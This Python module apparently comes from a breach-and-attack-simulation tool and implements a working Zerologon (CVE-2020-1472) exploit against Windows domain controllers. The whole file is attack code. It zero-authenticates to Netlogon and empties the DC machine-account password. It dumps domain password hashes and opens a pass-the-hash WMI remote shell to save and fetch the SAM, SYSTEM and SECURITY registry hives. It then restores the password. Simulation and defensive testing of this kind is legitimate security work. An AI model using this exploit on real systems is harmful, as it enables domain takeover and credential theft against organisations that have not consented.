"""
Zerologon, CVE-2020-1472
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and
https://github.com/risksense/zerologon/.
"""

import logging
import os
import re
import tempfile
from binascii import unhexlify
from time import time
from typing import Dict, List, Optional, Sequence, Tuple

import impacket
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5.dtypes import NULL

from common.agent_events import AgentEventTag, CredentialsStolenEvent, PasswordRestorationEvent
from common.credentials import Credentials, LMHash, NTHash, Username
from common.tags import (
    ACCOUNT_MANIPULATION_T1098_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    OS_CREDENTIAL_DUMPING_T1003_TAG,
)
from infection_monkey.i_puppet import ExploiterResult
from infection_monkey.utils.threading import interruptible_iter

from .HostExploiter import HostExploiter
from .zerologon_utils.capture_output import StdoutCapture
from .zerologon_utils.dc_utils import connect_to_dc, get_dc_details
from .zerologon_utils.dump_secrets import DumpSecrets
from .zerologon_utils.options import OptionsForSecretsdump
from .zerologon_utils.wmiexec import Wmiexec

logger = logging.getLogger(__name__)

ZEROLOGON_EXPLOITER_TAG = "zerologon-exploiter"

CREDENTIALS_STOLEN_EVENT_TAGS = frozenset(
    {
        ZEROLOGON_EXPLOITER_TAG,
        OS_CREDENTIAL_DUMPING_T1003_TAG,
        ACCOUNT_MANIPULATION_T1098_TAG,
    }
)

PASSWORD_RESTORATION_EVENT_TAGS = frozenset({ZEROLOGON_EXPLOITER_TAG})


class ZerologonExploiter(HostExploiter):
    _EXPLOITED_SERVICE = "Netlogon"
    _EXPLOITER_TAGS = (
        ZEROLOGON_EXPLOITER_TAG,
        OS_CREDENTIAL_DUMPING_T1003_TAG,
        ACCOUNT_MANIPULATION_T1098_TAG,
        EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    )
    _PROPAGATION_TAGS: Tuple[AgentEventTag, ...] = tuple()

    ERROR_CODE_ACCESS_DENIED = 0xC0000022

    def __init__(self):
        super().__init__()
        self.exploit_info["password_restored"] = None
        self._extracted_creds = {}
        self._secrets_dir = tempfile.TemporaryDirectory(prefix="zerologon")

    def __del__(self):
        self._secrets_dir.cleanup()

    def _exploit_host(self) -> ExploiterResult:
        self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host)

        authenticated, rpc_con, timestamp = self._zero_authenticate()
        if authenticated:
            logger.info("Target vulnerable, changing account password to empty string.")

            if self._is_interrupted():
                return self.exploit_result

            # Start exploiting attempts.
            logger.debug("Attempting password change.")
            _password_changed = self._send_rpc_password_change_request(rpc_con, timestamp)

            rpc_con.disconnect()  # type: ignore[union-attr]

        else:
            logger.info(
                "Zero authentication failed. Target is most likely patched, or an error was "
                "encountered."
            )
            return self.exploit_result

        # Restore DC's original password.
        if _password_changed:
            self.exploit_result.propagation_success = False
            self.exploit_result.exploitation_success = _password_changed
            if self._restore_password():
                self.exploit_info["password_restored"] = True
                logger.info("System exploited and password restored successfully.")
            else:
                self.exploit_info["password_restored"] = False
                logger.info("System exploited but couldn't restore password!")

            self.store_extracted_creds_for_exploitation()
        else:
            logger.info("System was not exploited.")

        return self.exploit_result

    def _zero_authenticate(self) -> Tuple[bool, Optional[rpcrt.DCERPC_v5], float]:
        """
        Attempt to authenticate with the domain controller

        :return:
            - Whether or not authentication was successful
            - An RPC connection on success, otherwise None
        """
        # Connect to the DC's Netlogon service.
        timestamp = time()
        try:
            rpc_con = connect_to_dc(self.dc_ip)
        except Exception as err:
            error_message = f"Exception occurred while connecting to DC: {err}"
            logger.info(error_message)
            self._publish_exploitation_event(timestamp, False, error_message=error_message)
            return False, None, timestamp

        # Try authenticating.
        for _ in interruptible_iter(range(0, self.options.max_attempts), self.interrupt):
            timestamp = time()
            try:
                rpc_con_auth_result = self._try_zero_authenticate(rpc_con)
                if rpc_con_auth_result is not None:
                    return True, rpc_con_auth_result, timestamp

                error_message = "Failed to authenticate with domain controller"
                self._publish_exploitation_event(timestamp, False, error_message=error_message)
            except Exception as err:
                error_message = f"Error occured while authenticating to {self.host.ip}: {err}"
                logger.info(error_message)
                self._publish_exploitation_event(timestamp, False, error_message=error_message)
                return False, None, timestamp

        logger.info(
            "Failed to authenticate to the domain controller after: "
            f"{self.options.max_attempts} tries."
        )
        return False, None, timestamp

    def _try_zero_authenticate(self, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5:
        plaintext = b"\x00" * 8
        ciphertext = b"\x00" * 8
        flags = 0x212FFFFF

        # Send challenge and authentication request.
        nrpc.hNetrServerReqChallenge(
            rpc_con,
            self.dc_handle + "\x00",
            self.dc_name + "\x00",
            plaintext,
        )

        try:
            server_auth = nrpc.hNetrServerAuthenticate3(
                rpc_con,
                self.dc_handle + "\x00",
                self.dc_name + "$\x00",
                nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                self.dc_name + "\x00",
                ciphertext,
                flags,
            )

            assert server_auth["ErrorCode"] == 0
            return rpc_con

        except nrpc.DCERPCSessionError as ex:
            if (
                ex.get_error_code() == 0xC0000022
            ):  # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
                pass
            else:
                raise Exception(f"Unexpected error code: {ex.get_error_code()}.")

        except BaseException as ex:
            raise Exception(f"Unexpected error: {ex}.")

    def _send_rpc_password_change_request(self, rpc_con, timestamp: float) -> bool:
        password_change_attempt_result = self._try_password_change(rpc_con, timestamp)

        is_password_changed = self.assess_password_change_attempt_result(
            password_change_attempt_result, timestamp
        )
        return is_password_changed

    def _try_password_change(self, rpc_con, timestamp: float) -> Optional[object]:
        error_message = ""
        try:
            password_change_attempt_result = self._attempt_password_change(rpc_con)
            return password_change_attempt_result
        except nrpc.DCERPCSessionError as err:
            # Failure should be due to a STATUS_ACCESS_DENIED error.
            # Otherwise, the attack is probably not working.
            if err.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
                error_message = f"Unexpected error code from DC: {err.get_error_code()}"
                logger.info(error_message)
        except Exception as err:
            error_message = f"Unexpected error: {err}"
            logger.info(error_message)

        self._publish_exploitation_event(timestamp, False, error_message=error_message)

        return None

    def _attempt_password_change(self, rpc_con: rpcrt.DCERPC_v5) -> object:
        request = nrpc.NetrServerPasswordSet2()
        self._set_up_password_change_request(request)

        request["PrimaryName"] = self.dc_handle + "\x00"
        request["ClearNewPassword"] = b"\x00" * 516

        return rpc_con.request(request)

    def _set_up_password_change_request(self, request: nrpc.NetrServerPasswordSet2) -> None:
        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
        authenticator["Credential"] = b"\x00" * 8
        authenticator["Timestamp"] = b"\x00" * 4

        request["AccountName"] = self.dc_name + "$\x00"
        request["ComputerName"] = self.dc_name + "\x00"
        request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
        request["Authenticator"] = authenticator

    def assess_password_change_attempt_result(
        self, password_change_attempt_result, timestamp: float
    ) -> bool:
        if password_change_attempt_result:
            if password_change_attempt_result["ErrorCode"] == 0:
                self.report_login_attempt(result=True, user=self.dc_name)
                _password_changed = True
                logger.info("Password change complete!")

                self._publish_exploitation_event(timestamp, True)
            else:
                self.report_login_attempt(result=False, user=self.dc_name)
                _password_changed = False
                error_message = (
                    f"Non-zero return code: {password_change_attempt_result['ErrorCode']}."
                    "Something went wrong."
                )
                logger.info(error_message)

                self._publish_exploitation_event(timestamp, False, error_message=error_message)
            return _password_changed

        return False

    def _restore_password(self) -> bool:
        logger.info("Restoring original password...")

        try:
            rpc_con = None

            # DCSync to get usernames and their passwords' hashes.
            logger.debug("DCSync; getting usernames and their passwords' hashes.")
            user_creds = self.get_all_user_creds()
            if not user_creds:
                raise Exception("Couldn't extract any usernames and/or their passwords' hashes.")

            # Use above extracted credentials to get original DC password's hashes.
            logger.debug("Getting original DC password's NT hash.")
            original_pwd_nthash = None
            for user_details in user_creds:
                username = user_details[0]
                user_pwd_hashes = [
                    user_details[1]["lm_hash"],
                    user_details[1]["nt_hash"],
                ]
                try:
                    original_pwd_nthash = self.get_original_pwd_nthash(username, user_pwd_hashes)
                    if original_pwd_nthash:
                        break
                except Exception as e:
                    logger.info(f"Credentials didn't work. Exception: {str(e)}")

            if not original_pwd_nthash:
                raise Exception("Couldn't extract original DC password's NT hash.")

            # Connect to the DC's Netlogon service.
            try:
                rpc_con = connect_to_dc(self.dc_ip)
            except Exception as e:
                logger.info(f"Exception occurred while connecting to DC: {str(e)}")
                return False

            # Start restoration attempts.
            logger.debug("Attempting password restoration.")
            _restored = self._send_restoration_rpc_login_requests(rpc_con, original_pwd_nthash)
            if not _restored:
                raise Exception("Failed to restore password! Max attempts exceeded?")

            return _restored

        except Exception as e:
            logger.error(e)
            return False

        finally:
            if rpc_con:
                rpc_con.disconnect()  # type: ignore[attr-defined]

    def get_all_user_creds(self) -> Optional[List[Tuple[str, Dict]]]:
        try:
            options = OptionsForSecretsdump(
                # format for DC account - "NetBIOSName$@0.0.0.0"
                target=f"{self.dc_name}$@{self.dc_ip}",
                target_ip=self.dc_ip,
                dc_ip=self.dc_ip,
            )

            dumped_secrets = self.get_dumped_secrets(
                remote_name=self.dc_ip, username=f"{self.dc_name}$", options=options
            )

            self._extract_user_creds_from_secrets(dumped_secrets=dumped_secrets)

            creds_to_use_for_getting_original_pwd_hashes: List[Tuple[str, Dict]] = []
            admin = "Administrator"
            for user in self._extracted_creds.keys():
                if user == admin:  # most likely to work so try this first
                    creds_to_use_for_getting_original_pwd_hashes.insert(
                        0, (user, self._extracted_creds[user])
                    )
                else:
                    creds_to_use_for_getting_original_pwd_hashes.append(
                        (user, self._extracted_creds[user])
                    )

            return creds_to_use_for_getting_original_pwd_hashes

        except Exception as e:
            logger.info(
                f"Exception occurred while dumping secrets to get some username and its "
                f"password's NT hash: {str(e)}"
            )

        return None

    def get_dumped_secrets(
        self,
        remote_name: str = "",
        username: str = "",
        options: Optional[object] = None,
    ) -> List[str]:
        dumper = DumpSecrets(remote_name=remote_name, username=username, options=options)
        dumped_secrets = dumper.dump().split("\n")
        return dumped_secrets

    def _extract_user_creds_from_secrets(self, dumped_secrets: List[str]) -> None:
        # format of secret we're looking for - "domain\uid:rid:lmhash:nthash:::"
        re_phrase = r"([\S]*[:][0-9]*[:][a-zA-Z0-9]*[:][a-zA-Z0-9]*[:][:][:])"

        for line in dumped_secrets:
            secret = re.fullmatch(pattern=re_phrase, string=line)
            if secret:
                parts_of_secret = secret[0].split(":")
                user = parts_of_secret[0].split("\\")[-1]  # we don't want the domain
                user_RID, lmhash, nthash = parts_of_secret[1:4]

                self._extracted_creds[user] = {
                    "RID": int(user_RID),  # relative identifier
                    "lm_hash": lmhash,
                    "nt_hash": nthash,
                }

    def store_extracted_creds_for_exploitation(self) -> None:
        for user in self._extracted_creds.keys():
            self.send_extracted_creds_as_credential_stolen_event(
                user,
                self._extracted_creds[user]["lm_hash"],
                self._extracted_creds[user]["nt_hash"],
            )

    def send_extracted_creds_as_credential_stolen_event(
        self, user: str, lmhash: str, nthash: str
    ) -> None:
        extracted_credentials = [
            Credentials(identity=Username(username=user), secret=LMHash(lm_hash=lmhash)),
            Credentials(identity=Username(username=user), secret=NTHash(nt_hash=nthash)),
        ]

        self._publish_credentials_stolen_event(extracted_credentials)

    def _publish_credentials_stolen_event(
        self, extracted_credentials: Sequence[Credentials]
    ) -> None:
        credentials_stolen_event = CredentialsStolenEvent(
            source=self.agent_id,
            target=self.host.ip,
            tags=CREDENTIALS_STOLEN_EVENT_TAGS,
            stolen_credentials=extracted_credentials,
        )
        self.agent_event_publisher.publish(credentials_stolen_event)

    def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> Optional[str]:
        if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
            return None

        try:
            options = OptionsForSecretsdump(
                dc_ip=self.dc_ip,
                just_dc=False,
                system=os.path.join(self._secrets_dir.name, "monkey-system.save"),
                sam=os.path.join(self._secrets_dir.name, "monkey-sam.save"),
                security=os.path.join(self._secrets_dir.name, "monkey-security.save"),
            )

            dumped_secrets = self.get_dumped_secrets(remote_name="LOCAL", options=options)
            for secret in dumped_secrets:
                if "$MACHINE.ACC: " in secret:  # format of secret - "$MACHINE.ACC: lmhash:nthash"
                    nthash = secret.split(":")[2]
                    return nthash

        except Exception as e:
            logger.info(
                f"Exception occurred while dumping secrets to get original DC password's NT "
                f"hash: {str(e)}"
            )

        finally:
            self.remove_locally_saved_HKLM_keys()

        return None

    def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
        logger.info(f"Starting remote shell on victim with user: {username}")

        wmiexec = Wmiexec(
            ip=self.dc_ip,
            username=username,
            hashes=":".join(user_pwd_hashes),
            domain=self.dc_ip,
            secrets_dir=self._secrets_dir,
        )

        remote_shell = wmiexec.get_remote_shell()
        if remote_shell:
            with StdoutCapture() as output_captor:
                try:
                    # Save HKLM keys on victim.
                    remote_shell.onecmd(
                        "reg save HKLM\\SYSTEM system.save && "
                        + "reg save HKLM\\SAM sam.save && "
                        + "reg save HKLM\\SECURITY security.save"
                    )

                    # Get HKLM keys locally (can't run these together because it needs to call
                    # do_get()).
                    remote_shell.onecmd("get system.save")
                    remote_shell.onecmd("get sam.save")
                    remote_shell.onecmd("get security.save")

                    # Delete saved keys on victim.
                    remote_shell.onecmd("del /f system.save sam.save security.save")

                    wmiexec.close()

                    return True

                except Exception as e:
                    logger.info(f"Exception occurred: {str(e)}")

                finally:
                    info = output_captor.get_captured_stdout_output()
                    logger.debug(f"Getting victim HKLM keys via remote shell: {info}")

        else:
            raise Exception("Could not start remote shell on DC.")

        return False

    def remove_locally_saved_HKLM_keys(self) -> None:
        for name in ["system", "sam", "security"]:
            path = os.path.join(self._secrets_dir.name, f"monkey-{name}.save")
            try:
                os.remove(path)
            except Exception as e:
                logger.info(f"Exception occurred while removing file {path} from system: {str(e)}")

    def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> bool:
        for _ in interruptible_iter(range(0, self.options.max_attempts), self.interrupt):
            restoration_attempt_result = self.try_restoration_attempt(rpc_con, original_pwd_nthash)

            is_restored = self.assess_restoration_attempt_result(restoration_attempt_result)
            if is_restored:
                return is_restored

        return False

    def try_restoration_attempt(
        self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
    ) -> Optional[object]:
        try:
            restoration_attempt_result = self.attempt_restoration(rpc_con, original_pwd_nthash)
            return restoration_attempt_result
        except nrpc.DCERPCSessionError as e:
            # Failure should be due to a STATUS_ACCESS_DENIED error.
            # Otherwise, the attack is probably not working.
            if e.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
                logger.info(f"Unexpected error code from DC: {e.get_error_code()}")
        except BaseException as e:
            logger.info(f"Unexpected error: {e}")

        return False

    def attempt_restoration(
        self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
    ) -> Optional[object]:
        plaintext = b"\x00" * 8
        ciphertext = b"\x00" * 8
        flags = 0x212FFFFF

        # Send challenge and authentication request.
        server_challenge_response = nrpc.hNetrServerReqChallenge(
            rpc_con, self.dc_handle + "\x00", self.dc_name + "\x00", plaintext
        )
        server_challenge = server_challenge_response["ServerChallenge"]

        server_auth = nrpc.hNetrServerAuthenticate3(
            rpc_con,
            self.dc_handle + "\x00",
            self.dc_name + "$\x00",
            nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
            self.dc_name + "\x00",
            ciphertext,
            flags,
        )

        assert server_auth["ErrorCode"] == 0
        session_key = nrpc.ComputeSessionKeyAES(
            None,
            b"\x00" * 8,
            server_challenge,
            unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"),
        )

        try:
            nrpc.NetrServerPasswordSetResponse = NetrServerPasswordSetResponse
            nrpc.OPNUMS[6] = (NetrServerPasswordSet, nrpc.NetrServerPasswordSetResponse)

            request = NetrServerPasswordSet()
            self._set_up_password_change_request(request)
            request["PrimaryName"] = NULL
            pwd_data = impacket.crypto.SamEncryptNTLMHash(
                unhexlify(original_pwd_nthash), session_key
            )
            request["UasNewPassword"] = pwd_data

            rpc_con.request(request)

        except Exception as e:
            logger.info(f"Unexpected error: {e}")

        return rpc_con

    def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool:
        if restoration_attempt_result:
            self._publish_password_restoration_event(success=True)
            logger.debug("DC machine account password should be restored to its original value.")
            return True

        self._publish_password_restoration_event(success=False)
        return False

    def _publish_password_restoration_event(self, success: bool):
        password_restoration_event = PasswordRestorationEvent(
            source=self.agent_id,
            target=self.host.ip,
            tags=PASSWORD_RESTORATION_EVENT_TAGS,
            success=success,
        )
        self.agent_event_publisher.publish(password_restoration_event)


class NetrServerPasswordSet(nrpc.NDRCALL):
    opnum = 6
    structure = (
        ("PrimaryName", nrpc.PLOGONSRV_HANDLE),
        ("AccountName", nrpc.WSTR),
        ("SecureChannelType", nrpc.NETLOGON_SECURE_CHANNEL_TYPE),
        ("ComputerName", nrpc.WSTR),
        ("Authenticator", nrpc.NETLOGON_AUTHENTICATOR),
        ("UasNewPassword", nrpc.ENCRYPTED_NT_OWF_PASSWORD),
    )


class NetrServerPasswordSetResponse(nrpc.NDRCALL):
    structure = (
        ("ReturnAuthenticator", nrpc.NETLOGON_AUTHENTICATOR),
        ("ErrorCode", nrpc.NTSTATUS),
    )
